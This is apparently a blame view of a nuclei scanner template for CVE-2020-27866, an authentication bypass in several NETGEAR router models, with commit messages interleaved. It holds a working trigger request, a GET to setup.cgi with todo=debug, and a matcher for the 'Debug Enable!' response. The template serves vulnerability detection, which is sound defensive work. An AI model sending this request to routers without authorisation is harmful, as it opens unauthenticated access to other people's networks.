Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
|
|
|
id: CVE-2020-27866
|
|
|
|
|
|
|
|
info:
|
2021-08-29 06:39:06 +00:00
|
|
|
name: NETGEAR Authentication Bypass vulnerability
|
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
|
|
|
author: gy741
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020,
|
|
|
|
Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
|
|
|
|
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
|
2021-08-29 06:36:59 +00:00
|
|
|
- https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-27866
|
|
|
|
cwe-id: CWE-288
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,netgear,auth-bypass
|
Create CVE-2020-27866.yaml
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-18 00:27:34 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Accept: */*
|
|
|
|
Accept-Language: en
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-07-18 17:54:55 +00:00
|
|
|
- 'Debug Enable!'
|
|
|
|
part: body
|